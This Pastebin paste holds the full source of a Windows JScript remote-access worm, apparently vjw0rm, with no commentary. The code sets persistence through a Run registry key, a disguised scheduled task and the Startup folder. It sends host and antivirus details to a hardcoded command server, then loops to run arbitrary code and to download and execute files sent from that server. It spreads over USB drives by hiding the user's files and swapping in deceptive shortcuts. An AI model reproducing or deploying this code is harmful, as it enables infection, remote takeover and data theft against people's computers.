API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 16th, 2017
108
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.77 KB | None | 0 0
raw download clone embed print report
  1. // Coded by v_B01 | Sliemerez -> Twitter : Sliemerez
  2.  
  3. var j = ["WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];
  4. var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];
  5. var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];
  6.  
  7. var sh = Cr(0);
  8. var fs = Cr(1);
  9. var spl = "|V|";
  10. var Ch = "\\";
  11. var VN = "mdz" + "_" + Ob(6);
  12. var fu = WScript.ScriptFullName;
  13. var wn = WScript.ScriptName;
  14. var U;
  15. try {
  16. U = sh.RegRead(g[2]);
  17. } catch(err) {
  18. var sv = fu.split("\\");
  19. if (":\\" + sv[1] == ":\\" + wn) {
  20. U = "TRUE";
  21. sh.RegWrite(g[2],U,g[5]);
  22. } else {
  23. U = "FALSE";
  24. sh.RegWrite(g[2],U,g[5]);
  25. }
  26. }
  27. Ns();
  28. do {
  29. try {
  30. var P = Pt('Vre','');
  31. P = P.split(spl);
  32.  
  33. if (P[0] === "Cl") {
  34. WScript.Quit(1);
  35. }
  36.  
  37. if (P[0] === "Sc") {
  38. var s2 = Ex("temp") + "\\" + P[2];
  39. var fi = fs.CreateTextFile(s2,true);
  40. fi.Write(P[1]);
  41. fi.Close();
  42. sh.run(s2);
  43. }
  44.  
  45. if (P[0] === "Ex") {
  46. eval(P[1]);
  47. }
  48.  
  49. if (P[0] === "Rn") {
  50. var ri = fs.OpenTextFile(fu,1);
  51. var fr = ri.ReadAll();
  52. ri.Close();
  53. VN = VN.split("_");
  54. fr = fr.replace(VN[0],P[1]);
  55. var wi = fs.OpenTextFile(fu,2,false);
  56. wi.Write(fr);
  57. wi.Close();
  58. sh.run("wscript.exe //B \"" + fu + "\"");
  59. WScript.Quit(1);
  60. }
  61.  
  62. if (P[0] === "Up") {
  63. var s2 = Ex("temp") + "\\" + P[2];
  64. var ctf = fs.CreateTextFile(s2,true);
  65. var gu = P[1];
  66. gu = gu.replace("|U|","|V|");
  67. ctf.Write(gu);
  68. ctf.Close();
  69. sh.run("wscript.exe //B \"" + s2 + "\"",6);
  70. WScript.Quit(1);
  71. }
  72.  
  73. if (P[0] === "Un") {
  74. var s2 = P[1];
  75. var vdr = Ex("Temp") + Ch + wn;
  76. var regi = "LULG0YFRS5";
  77. s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);
  78. eval(s2);
  79. WScript.Quit(1);
  80. }
  81.  
  82. if (P[0] === "RF") {
  83. var s2 = Ex("temp") + "\\" + P[2];
  84. var fi = fs.CreateTextFile(s2,true);
  85. fi.Write(P[1]);
  86. fi.Close();
  87. sh.run(s2);
  88. }
  89. } catch(err) {
  90. }
  91. WScript.Sleep(7000);
  92. Spr();
  93. } while (true) ;
  94.  
  95.  
  96. function Ex(S) {
  97. return sh.ExpandEnvironmentStrings("%" + S + "%");
  98. }
  99. function Pt(C,A) {
  100. var X = Cr(3);
  101. X.open('POST','http://41.102.196.226:1998/' + C, false);
  102. X.SetRequestHeader("User-Agent:",nf());
  103. X.send(A);
  104. return X.responsetext;
  105. }
  106.  
  107.  
  108. function nf() {
  109. var s,NT,i;
  110. if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {
  111. NT ="YES";
  112. } else {
  113. NT = "NO";
  114. }
  115. s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
  116. return s;
  117. }
  118.  
  119. function Cr(N) {
  120. return new ActiveXObject(j[N]);
  121. }
  122.  
  123. function Ob(N) {
  124. var s;
  125. if (N == 2) {
  126. s = GetObject(y[0]).InstancesOf(y[2]);
  127. var en = new Enumerator(s);
  128. for (; !en.atEnd();en.moveNext()) {
  129. var it = en.item();
  130. return it.Caption;
  131. break;
  132. }
  133. }
  134. if (N == 4) {
  135. var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
  136. s = GetObject(wmg).InstancesOf(y[3]);
  137. var en = new Enumerator(s);
  138. for (; !en.atEnd();en.moveNext()) {
  139. var it = en.item();
  140. var str = it.DisplayName;
  141. }
  142. if (str !== '') {
  143. wmg = wmg + "2";
  144. s = GetObject(wmg).InstancesOf(y[3]);
  145. en = new Enumerator(s);
  146. for (; !en.atEnd();en.moveNext()) {
  147. it = en.item();
  148. return it.DisplayName;
  149. }
  150. } else {
  151. return it.DisplayName;
  152. }
  153. }
  154. if (N==6) {
  155. s = GetObject(y[0]).InstancesOf(y[1]);
  156. var en = new Enumerator(s);
  157. for (; !en.atEnd();en.moveNext()) {
  158. var it = en.item();
  159. return it.volumeserialnumber;
  160. break;
  161. }
  162. }
  163. }
  164.  
  165. function Ns() {
  166. var dr = Ex("UserProfile") + Ch + wn;
  167. try {
  168. fs.CopyFile(fu,dr,true);
  169. } catch(err) {
  170. }
  171. try {
  172. sh.RegWrite(g[0] + g[3] + "LULG0YFRS5","\"" + dr + "\"",g[5]);
  173. } catch(err) {
  174. }
  175. try {
  176. sh.run("Schtasks /create /sc minute /mo 30 /tn Skype /tr \"" + dr,false);
  177. } catch(err) {
  178. }
  179.  
  180. try {
  181. var ap = Cr(2);
  182. fs.CopyFile(fu, ap.NameSpace(7).Self.Path + "\\" + wn,true);
  183. } catch(err) {
  184. }
  185. }
  186.  
  187.  
  188. function Spr() {
  189. try {
  190. var ld = GetObject(y[0]).InstancesOf(y[1]);
  191. var edi = new Enumerator(ld);
  192. for (;!edi.atEnd();edi.moveNext())
  193. {
  194. var dri = edi.item();
  195. var dri = fs.GetDrive(dri.DeviceID);
  196. var dp = dri.Path + "\\";
  197. if (dri.IsReady) {
  198. if (dri.DriveType === 1) {
  199. fs.CopyFile(fu,dp + wn,true);
  200. if (fs.FileExists(dp + wn)) {
  201. fs.GetFile(dp + wn).attributes=2+4;
  202. }
  203. try {
  204. var ef = new Enumerator(fs.GetFolder(dp).SubFolders);
  205. for (;!ef.atEnd();ef.moveNext()) {
  206. var gf = ef.item();
  207. gf.attributes=2+4;
  208. wn = wn.replace(" ", "\"" + " " + "\"");
  209. var n = gf.name;
  210. n = n.replace(" ", "\"" + " " + "\"");
  211. var sr = sh.CreateShortCut(dp + gf.name + ".lnk");
  212. sr.WindowStyle = 7;
  213. sr.TargetPath = "cmd.exe";
  214. sr.Arguments = "/c start " + wn + "&start explorer " + n + "&exit";
  215. var rp = "HKLM\\software\\classes\\folder\\defaulticon\\";
  216. var fic = sh.RegRead(rp);
  217. var ci = sr.IconLocation;
  218. var sci = ",";
  219. if (ci.indexOf(sci) !== -1) {
  220. sr.IconLocation = fic;
  221. } else {
  222. sr.IconLocation = gf.Path;
  223. }
  224. sr.Save();
  225. }
  226.  
  227. } catch(err) {}
  228. try {
  229. var efi = new Enumerator(fs.GetFolder(dp).Files);
  230. for (;!efi.atEnd();efi.moveNext()) {
  231. var gfi = efi.item();
  232. var dot = ".";
  233. var lnk = "lnk";
  234. if (gfi.name.indexOf(dot) !== -1) {
  235. if (gfi.name.indexOf(lnk) !== -1) {
  236. } else {
  237. if (gfi.name !== wn) {
  238. gfi.attributes=2+4;
  239. var nu = gfi.name;
  240. nu = nu.replace(" ", "\"" + " " + "\"");
  241. wn = wn.replace(" ", "\"" + " " + "\"");
  242. var shr = sh.CreateShortCut(dp + gfi.name + ".lnk");
  243. shr.WindowStyle=7;
  244. shr.TargetPath = "cmd.exe";
  245. shr.Arguments = "/c start " + wn + "&start " + nu + "&exit";
  246. var sgf = gfi.name.split(".");
  247. var fvi = sh.RegRead(g[4] + "." + sgf[sgf.length -1] + "\\");
  248. var fvi2 = sh.RegRead(g[4] + fvi + g[6] + "\\");
  249. var ci = shr.IconLocation;
  250. var sci = ",";
  251. if (ci.indexOf(sci) !== -1) {
  252. shr.IconLocation = fvi2;
  253. } else {
  254. shr.IconLocation = gfi.Path;
  255. }
  256. shr.Save();
  257. }
  258. }
  259. }
  260. }
  261. } catch(err) {}
  262. }
  263. }
  264. }
  265.  
  266. } catch(err) {
  267.  
  268. }
  269. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!